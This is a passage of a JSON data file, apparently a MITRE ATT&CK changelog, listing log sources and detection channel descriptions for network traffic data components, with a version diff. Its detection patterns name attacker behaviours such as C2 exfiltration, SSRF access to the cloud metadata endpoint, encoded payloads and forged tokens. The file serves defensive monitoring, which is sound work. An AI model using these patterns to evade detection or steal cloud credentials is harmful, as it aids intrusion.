                            "name": "NSM:Flow",
                            "channel": "Unusual Base64-encoded content in URI, headers, or POST body"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Base64 strings or gzip in URI, headers, or POST body"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Inbound connections to 445, 3389, 5985-5986 with high error/connection-reset rate, followed by new outbound sessions from the same host to internal assets within short interval."
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Inbound connections to monitored service ports from external or unusual internal sources; rapid follow-on lateral connections from the same host."
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Inbound to tcp/427 (OpenSLP), tcp/443 (vSphere APIs), tcp/902, tcp/5989 followed by new unexpected outbound sessions from the ESXi/vCenter host."
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Inbound to 22/5900/8080 and follow-on internal connections."
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http: HTTP body or headers contain long Base64 sections; gzip/deflate + Base64"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http: HTTP body contains long Base64 sections"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http: Base64/MIME looking payloads from ESXi host IP"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "LDAP Bind/Search"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "LDAP Query"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "smtp.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "smtp.log, conn.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "remote CLI session detection"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http.log, ftp.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "PCAP inspection"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "large HTTPS POST requests to webhook endpoints"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Single, low-volume inbound packet (REJ/S0/OTH or uncommon dport/protocol) from src_ip followed by outbound SF connection to src_ip."
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Rare inbound packet characteristics (ICMP/UDP/TCP to uncommon port) from src_ip followed \u2264TimeWindow by outbound SF from same host to src_ip."
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Inbound one-off packet to uncommon port \u2192 outbound SF to same src_ip within TimeWindow."
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "large upload to firmware interface port or path"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http.request: HTTP requests and responses for specific script resources, unexpected content-types (application/octet-stream for script URLs), suspicious referrers, or obfuscated javascript resources"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http::response: HTTP responses with suspicious content-type for scripts, long obfuscated javascript bodies, or redirects to exploit kit domains"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTP/HTTPS requests for script resources flagged by content inspection (excessive obfuscation, eval usage, unusual redirects)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ssl.log + http.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http/file-xfer: Outbound transfer of large video-like MIME types soon after capture"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound SCP, TFTP, or FTP sessions carrying configuration file content"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Session Transfer Content"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Captured File Content"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "C2 exfiltration"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Transferred file observations"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http::post: Outbound HTTP POST from host shortly after DB export activity"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTPS API requests to Dropbox, iCloud, Google Drive, OneDrive shortly after DB tool usage"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Observed downgrade in negotiated cipher suites or TLS/SSH versions across sessions"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "New egress from container IP/namespace to Internet or non-approved CIDRs/ASNs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "New VM egress to crypto-mining pools or non-approved Internet ranges within minutes of boot"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http::request: Network connection to package registry or C2 from interpreter shortly after install"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http::request: Outbound HTTP initiated by Python interpreter"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "DrsAddEntry, DrsReplicaAdd, GetNCChanges calls between non-DC and DCs."
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "large HTTPS POST requests to text storage domains"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Unexpected ARP replies or DNS responses inconsistent with authoritative servers"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "TLS downgrade or inconsistent DNS answers"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Unusual request pattern leading up to service crash (e.g., malformed or oversized payload)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "conn.log or http.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http: HTTP bodies/headers contain long tokens with non-standard alphabets or constant-size periodic POSTs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "dns: DNS labels with excessive length and restricted custom alphabets (e.g., base36 only) repeated frequently"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http: suspicious long tokens with custom alphabets in body/headers"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http: HTTP bodies from ESXi host IPs containing long, non-standard tokens"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Traffic patterns showing downgrade from strong encryption (AES-256) to weaker or plaintext protocols"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTP(S) requests with User-Agents typical of PowerShell or curl from desktop; or URIs matching paste-inspired payload hosts"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Egress to non-approved networks from host after terminal exec"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Flow/PCAP analysis for outbound payloads"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "conn.log + files.log + ssl.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTPS or custom protocol traffic with large payloads"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Unexpected script or binary content returned in HTTP response body"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Injected content responses with unexpected script/malware signatures"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Content injection observed in HTTPS responses with mismatched certificates or altered payloads"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Relay patterns across IP hops"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ldap.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Probe responses from unauthorized APs responding to client probe requests"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Excessive gratuitous ARP replies on local subnet"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Inbound HTTP POST with suspicious payload size or user-agent"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "POST requests to .php, .jsp, .aspx files with high entropy body"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "dns.log"
                        },
                        {
                            "name": "NSM:FLow",
                            "channel": "dns.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Encrypted tunnels or proxy traffic to non-standard destinations"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "large transfer from management IPs to unauthorized host"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Sustained abnormal inbound request rate targeting application ports (e.g., 80/443/25)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ftp.log, smb_files.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ftp.log, conn.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "mirror/SPAN port"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ftp.log, conn.log, smb_files.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "SSL/TLS Inspection or PCAP"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "conn.log, ssl.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "http, dns, smb, ssl logs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "dns, ssl, conn"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "conn.log, http.log, dns.log, ssl.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ICMP/UDP traffic (Wireshark, Suricata, Zeek)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "icmp.log, weird.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ICMP/UDP monitoring (tcpdump, Wireshark, Zeek)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Unusual responses to LLMNR (UDP 5355) or NBT-NS (UDP 137) queries from unauthorized hosts"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "DHCP OFFER or ACK with unauthorized DNS/gateway parameters"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Multiple DHCP OFFER responses for a single DISCOVER"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "SSL/TLS Handshake Analysis"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTP Header Metadata"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Network Capture TLS/HTTP"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "container egress to unknown IPs/domains"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTP Request Logging"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ssh connections originating from third-party CIDRs"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ssh/smb connections to internal resources from third-party devices"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Degraded encryption throughput or switch to weaker cipher suites compared to historical baselines"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ssl.log (for TLS handshake analysis), dns.log (tunneling indicators)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "host switch egress data"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound HTTP/S"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ssl.log - Certificate Analysis"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ssl.log, conn.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "ssl.log, x509.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Packets with unusual flags or payloads outside established flows (e.g., WoL magic FF\u00d76 + 16\u00d7MAC)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Suspicious POSTs to upload endpoints"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "TLS/HTTP download with atypical MIME (application/octet-stream, application/x-zip, application/x-gzip) followed by local decode/write"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTP(S)/QUIC media download with opaque content types (image/*, audio/*, video/*) from non-gallery domains or CDNs not previously used by the app"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTP(S)/QUIC download of executable/opaque content (application/octet-stream, application/zip, application/java-archive, application/x-dex, application/x-sharedlib, text/javascript)"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "burst of DNS queries/connection attempts to RFC1918 or local gateway immediately after scans"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "HTTPS sessions exhibiting periodic request cadence or structured payload exchanges inconsistent with application baseline"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Application-layer indicators observable via enterprise network controls (HTTP method, URI path pattern class, TLS SNI, JA3/ALPN when available, DNS qname/type) showing anomalous or low-and-slow command polling behavior"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Near-term increase in traffic to identity endpoints associated with SMS MFA, account recovery, or OTP verification (IdP, banking, crypto), correlated to SIM/service loss"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Abrupt shift from cellular egress to Wi-Fi-only egress, or new VPN/proxy session establishment following cellular service loss"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Application-layer web traffic showing suspicious redirect chains, iframe/ad-tech cascades, user-agent or environment fingerprinting requests, or staged payload retrieval after page visit"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Application initiates HTTPS connection with repeated certificate validation failure under enterprise proxy followed by direct network retry or stable opaque TLS communication to same endpoint within correlation window"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "App-destination pair shows consistent inspection bypass/refusal pattern followed by direct encrypted communication or repeated short-lived TLS sessions to same endpoint within correlation window"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Application retrieves remote content from non-baselined domain or IP and the transfer direction is inbound to device during the file acquisition phase"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Managed iOS app retrieves remote content from non-baselined domain or IP with inbound payload transfer during the acquisition phase"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Device shows correlated inbound session establishment followed by outbound connections to separate external destinations with overlapping timing and relay-like byte symmetry"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Traffic spike preceding control crash"
                        },
                        {
                            "name": "NSM:Inspection",
                            "channel": "TLS session from mobile app fails, resets, or refuses enterprise interception while same destination/app pair repeatedly establishes direct encrypted communication pattern consistent with pinned certificate/public-key validation"
                        },
                        {
                            "name": "NSM:Inspection",
                            "channel": "TLS handshake from iOS app repeatedly fails or is rejected only when enterprise SSL inspection certificate is presented, indicating certificate or public-key pin validation effect"
                        },
                        {
                            "name": "saas:box",
                            "channel": "API calls exceeding baseline thresholds"
                        },
                        {
                            "name": "saas:confluence",
                            "channel": "REST API access from non-browser agents"
                        },
                        {
                            "name": "TelecomLogs:SS7Signaling",
                            "channel": "Subscriber information queries, routing requests, or location update messages with anomalous node identifiers or unexpected origin patterns"
                        },
                        {
                            "name": "TelecomLogs:SS7Signaling",
                            "channel": "Location resolution, routing, or subscriber information exchanges with anomalous signaling paths or node identities"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "Supervised or newly activated device initiates outbound connections to destinations outside Apple, MDM, update, or enterprise-managed baselines while locked, with no recent user interaction, or before expected app enrollment completion"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "Application or device component communicates with legitimate external web-service infrastructure such as cloud storage, social media, messaging, collaboration, paste, code-hosting, CDN-backed API, or generic HTTPS service in a pattern inconsistent with the app's approved network baseline, timing, or service class"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "Supervised device or managed app communicates with legitimate external web-service infrastructure such as cloud storage, messaging, collaboration, social, paste, or generic HTTPS API platforms in a pattern inconsistent with expected service baseline, managed app role, or normal background refresh behavior"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "App-attributed HTTP GET or HTTPS session to public web platform (social, paste, collaboration, cloud storage, code-hosting) returned content followed by outbound connection to a different domain or IP within TimeWindow"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "DNS query or TLS SNI for previously unseen domain occurred within TimeWindow after session to legitimate web-service domain from same app identity"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "Initial session to public web-service domain transferred small response payload followed by connection to new external endpoint with different ASN or domain category"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "App-attributed session to public web-service domain included inbound content retrieval followed by outbound POST, PUT, upload, comment, message send, document update, or API write to same service class within TimeWindow"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "Repeated alternating inbound and outbound sessions to same public web-service domain or API endpoint occurred from same app identity with stable recurrence interval"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "Outbound write operation to public web-service domain occurred after small inbound response retrieval from same domain or service class without preceding user-visible foreground activity"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "App-attributed HTTP GET, content fetch, sync pull, or inbound-oriented HTTPS session to public web-service domain recurred within TimeWindow without app-attributed POST, PUT, PATCH, upload, comment, message send, or API write to same service class"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "Repeated app-attributed retrieval from same public web-service domain or API endpoint occurred at stable recurrence interval with low outbound volume relative to inbound content"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "Inbound content retrieval from public web-service domain occurred without subsequent writeback to same service class and was followed by local or downstream activity outside normal app sync profile"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "TLS handshake, HTTP method/header pattern, or WebSocket upgrade was observed on destination port outside approved port set for detected protocol during app-attributed outbound session"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "Repeated app-attributed sessions to same destination or service class used non-standard destination port with stable recurrence interval or persistent connection behavior"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "Destination port was not in approved protocol-to-port mapping for app identity or service class and session did not match known enterprise proxy, relay, or developer tooling exception"
                        },
                        {
                            "name": "VPN:MobileProxy",
                            "channel": "Observed protocol-to-port pairing was outside approved mapping for managed bundle or service class and did not match enterprise proxy, relay, or developer tooling exception"
                        },
                        {
                            "name": "WebProxy:AccessLogs",
                            "channel": "SSRF-like patterns accessing metadata endpoint through proxy (e.g., Host: 169.254.169.254)"
                        },
                        {
                            "name": "WIDS:AssociationLogs",
                            "channel": "Unauthorized AP or anomalous MAC address connection attempts"
                        },
                        {
                            "name": "WinEventLog:iis",
                            "channel": "IIS Logs"
                        },
                        {
                            "name": "WinEventLog:Microsoft-Windows-Windows Defender/Operational",
                            "channel": "Unusual external domain access"
                        },
                        {
                            "name": "WinEventLog:Sysmon",
                            "channel": "Outbound requests with forged tokens/cookies in headers"
                        },
                        {
                            "name": "WinEventLog:System",
                            "channel": "EventCode=5005 (WLAN), EventCode=302 (Bluetooth)"
                        }
                    ],
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_version": "2.1",
                    "x_mitre_domains": [
                        "ics-attack",
                        "mobile-attack",
                        "enterprise-attack"
                    ],
                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-22 14:48:50.367000+00:00\", \"old_value\": \"2025-10-21 15:14:34.343000+00:00\"}, \"root['x_mitre_version']\": {\"new_value\": \"2.1\", \"old_value\": \"2.0\"}}, \"iterable_item_added\": {\"root['x_mitre_log_sources'][0]\": {\"name\": \"Traffic\", \"channel\": \"None\"}, \"root['x_mitre_log_sources'][35]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Per-app VPN flow logging indicating opaque/archived payload transfer preceding local decode\"}, \"root['x_mitre_log_sources'][36]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"Per-App VPN flow with code-like content types (application/octet-stream, application/zip, text/javascript, application/x-mach-o)\"}, \"root['x_mitre_log_sources'][37]\": {\"name\": \"iOS:unifiedlog\", \"channel\": \"WKWebView navigation to domain visually similar to target brand (IDN/punycode/alike score)\"}, \"root['x_mitre_log_sources'][90]\": {\"name\": \"NSM:Connections\", \"channel\": \"Outbound connections to internal enterprise services exhibiting anomalous protocol behavior, malformed sessions, or exploit-consistent traffic patterns\"}, \"root['x_mitre_log_sources'][236]\": {\"name\": \"NSM:Flow\", \"channel\": \"TLS/HTTP download with atypical MIME (application/octet-stream, application/x-zip, application/x-gzip) followed by local decode/write\"}, \"root['x_mitre_log_sources'][237]\": {\"name\": \"NSM:Flow\", \"channel\": \"HTTP(S)/QUIC media download with opaque content types (image/*, audio/*, video/*) from non-gallery domains or CDNs not previously used by the app\"}, \"root['x_mitre_log_sources'][238]\": {\"name\": \"NSM:Flow\", \"channel\": \"HTTP(S)/QUIC download of executable/opaque content (application/octet-stream, application/zip, application/java-archive, application/x-dex, application/x-sharedlib, text/javascript)\"}, \"root['x_mitre_log_sources'][239]\": {\"name\": \"NSM:Flow\", \"channel\": \"burst of DNS queries/connection attempts to RFC1918 or local gateway immediately after scans\"}, \"root['x_mitre_log_sources'][240]\": {\"name\": \"NSM:Flow\", \"channel\": \"HTTPS sessions exhibiting periodic request cadence or structured payload exchanges inconsistent with application baseline\"}, \"root['x_mitre_log_sources'][241]\": {\"name\": \"NSM:Flow\", \"channel\": \"Application-layer indicators observable via enterprise network controls (HTTP method, URI path pattern class, TLS SNI, JA3/ALPN when available, DNS qname/type) showing anomalous or low-and-slow command polling behavior\"}, \"root['x_mitre_log_sources'][242]\": {\"name\": \"NSM:Flow\", \"channel\": \"Near-term increase in traffic to identity endpoints associated with SMS MFA, account recovery, or OTP verification (IdP, banking, crypto), correlated to SIM/service loss\"}, \"root['x_mitre_log_sources'][243]\": {\"name\": \"NSM:Flow\", \"channel\": \"Abrupt shift from cellular egress to Wi-Fi-only egress, or new VPN/proxy session establishment following cellular service loss\"}, \"root['x_mitre_log_sources'][244]\": {\"name\": \"NSM:Flow\", \"channel\": \"Application-layer web traffic showing suspicious redirect chains, iframe/ad-tech cascades, user-agent or environment fingerprinting requests, or staged payload retrieval after page visit\"}, \"root['x_mitre_log_sources'][245]\": {\"name\": \"NSM:Flow\", \"channel\": \"Application initiates HTTPS connection with repeated certificate validation failure under enterprise proxy followed by direct network retry or stable opaque TLS communication to same endpoint within correlation window\"}, \"root['x_mitre_log_sources'][246]\": {\"name\": \"NSM:Flow\", \"channel\": \"App-destination pair shows consistent inspection bypass/refusal pattern followed by direct encrypted communication or repeated short-lived TLS sessions to same endpoint within correlation window\"}, \"root['x_mitre_log_sources'][247]\": {\"name\": \"NSM:Flow\", \"channel\": \"Application retrieves remote content from non-baselined domain or IP and the transfer direction is inbound to device during the file acquisition phase\"}, \"root['x_mitre_log_sources'][248]\": {\"name\": \"NSM:Flow\", \"channel\": \"Managed iOS app retrieves remote content from non-baselined domain or IP with inbound payload transfer during the acquisition phase\"}, \"root['x_mitre_log_sources'][249]\": {\"name\": \"NSM:Flow\", \"channel\": \"Device shows correlated inbound session establishment followed by outbound connections to separate external destinations with overlapping timing and relay-like byte symmetry\"}, \"root['x_mitre_log_sources'][250]\": {\"name\": \"NSM:Flow\", \"channel\": \"Traffic spike preceding control crash\"}, \"root['x_mitre_log_sources'][251]\": {\"name\": \"NSM:Inspection\", \"channel\": \"TLS session from mobile app fails, resets, or refuses enterprise interception while same destination/app pair repeatedly establishes direct encrypted communication pattern consistent with pinned certificate/public-key validation\"}, \"root['x_mitre_log_sources'][252]\": {\"name\": \"NSM:Inspection\", \"channel\": \"TLS handshake from iOS app repeatedly fails or is rejected only when enterprise SSL inspection certificate is presented, indicating certificate or public-key pin validation effect\"}, \"root['x_mitre_log_sources'][255]\": {\"name\": \"TelecomLogs:SS7Signaling\", \"channel\": \"Subscriber information queries, routing requests, or location update messages with anomalous node identifiers or unexpected origin patterns\"}, \"root['x_mitre_log_sources'][256]\": {\"name\": \"TelecomLogs:SS7Signaling\", \"channel\": \"Location resolution, routing, or subscriber information exchanges with anomalous signaling paths or node identities\"}, \"root['x_mitre_log_sources'][257]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"Supervised or newly activated device initiates outbound connections to destinations outside Apple, MDM, update, or enterprise-managed baselines while locked, with no recent user interaction, or before expected app enrollment completion\"}, \"root['x_mitre_log_sources'][258]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"Application or device component communicates with legitimate external web-service infrastructure such as cloud storage, social media, messaging, collaboration, paste, code-hosting, CDN-backed API, or generic HTTPS service in a pattern inconsistent with the app's approved network baseline, timing, or service class\"}, \"root['x_mitre_log_sources'][259]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"Supervised device or managed app communicates with legitimate external web-service infrastructure such as cloud storage, messaging, collaboration, social, paste, or generic HTTPS API platforms in a pattern inconsistent with expected service baseline, managed app role, or normal background refresh behavior\"}, \"root['x_mitre_log_sources'][260]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"App-attributed HTTP GET or HTTPS session to public web platform (social, paste, collaboration, cloud storage, code-hosting) returned content followed by outbound connection to a different domain or IP within TimeWindow\"}, \"root['x_mitre_log_sources'][261]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"DNS query or TLS SNI for previously unseen domain occurred within TimeWindow after session to legitimate web-service domain from same app identity\"}, \"root['x_mitre_log_sources'][262]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"Initial session to public web-service domain transferred small response payload followed by connection to new external endpoint with different ASN or domain category\"}, \"root['x_mitre_log_sources'][263]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"App-attributed session to public web-service domain included inbound content retrieval followed by outbound POST, PUT, upload, comment, message send, document update, or API write to same service class within TimeWindow\"}, \"root['x_mitre_log_sources'][264]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"Repeated alternating inbound and outbound sessions to same public web-service domain or API endpoint occurred from same app identity with stable recurrence interval\"}, \"root['x_mitre_log_sources'][265]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"Outbound write operation to public web-service domain occurred after small inbound response retrieval from same domain or service class without preceding user-visible foreground activity\"}, \"root['x_mitre_log_sources'][266]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"App-attributed HTTP GET, content fetch, sync pull, or inbound-oriented HTTPS session to public web-service domain recurred within TimeWindow without app-attributed POST, PUT, PATCH, upload, comment, message send, or API write to same service class\"}, \"root['x_mitre_log_sources'][267]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"Repeated app-attributed retrieval from same public web-service domain or API endpoint occurred at stable recurrence interval with low outbound volume relative to inbound content\"}, \"root['x_mitre_log_sources'][268]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"Inbound content retrieval from public web-service domain occurred without subsequent writeback to same service class and was followed by local or downstream activity outside normal app sync profile\"}, \"root['x_mitre_log_sources'][269]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"TLS handshake, HTTP method/header pattern, or WebSocket upgrade was observed on destination port outside approved port set for detected protocol during app-attributed outbound session\"}, \"root['x_mitre_log_sources'][270]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"Repeated app-attributed sessions to same destination or service class used non-standard destination port with stable recurrence interval or persistent connection behavior\"}, \"root['x_mitre_log_sources'][271]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"Destination port was not in approved protocol-to-port mapping for app identity or service class and session did not match known enterprise proxy, relay, or developer tooling exception\"}, \"root['x_mitre_log_sources'][272]\": {\"name\": \"VPN:MobileProxy\", \"channel\": \"Observed protocol-to-port pairing was outside approved mapping for managed bundle or service class and did not match enterprise proxy, relay, or developer tooling exception\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.274000+00:00",
                    "modified": "2026-04-09 17:32:30.362000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/data-components/DC0078",
                            "external_id": "DC0078"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Network Traffic Flow",
                    "description": "Summarized network packet data that captures session-level details such as source/destination IPs, ports, protocol types, timestamps, and data volume, without storing full packet payloads. This is commonly used for traffic analysis, anomaly detection, and network performance monitoring.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "Network Traffic",
                            "channel": "None"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "socket_events"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Unexpected flows between segmented networks or prohibited ports"
                        },
                        {
                            "name": "snmp:config",
                            "channel": "Configuration change traps or policy enforcement failures"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "First-time outbound connections to package registries or unknown hosts immediately after restore/build"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "First-time egress to new registries/CDNs post-install/build"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "First-time egress to non-approved registries after dependency install"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Outbound connections to TCP 139,445 and HTTP/HTTPS to WebDAV endpoints from workstation subnets"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "large outbound data flows or long-duration connections"
                        },
                        {
                            "name": "AWS:VPCFlowLogs",
                            "channel": "egress > 90th percentile or frequent connection reuse"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "conn.log"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "socket/connect"
                        },
                        {
                            "name": "esxi:syslog",
                            "channel": "esxcli network vswitch or DNS resolver configuration updates"
                        },
                        {
                            "name": "esxi:vobd",
                            "channel": "Network Events"
                        },
                        {
                            "name": "iptables:LOG",
                            "channel": "TCP connections"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "connection metadata"
                        },
                        {
                            "name": "wineventlog:dhcp",
                            "channel": "DHCP Lease Granted"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "LEASE_GRANTED"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "MAC not in allow-list acquiring IP (DHCP)"
                        },
                        {
                            "name": "Windows Firewall Log",
                            "channel": "SMB over high port"
                        },
                        {
                            "name": "NSM:Connections",
                            "channel": "Internal connection logging"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "pf firewall logs"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "/var/log/vmkernel.log"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Inter-segment traffic"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "None"
                        },
                        {
                            "name": "NSM:Flow",
                            "channel": "Long-lived or hijacked SSH sessions maintained with no active user activity"
                        },
                        {
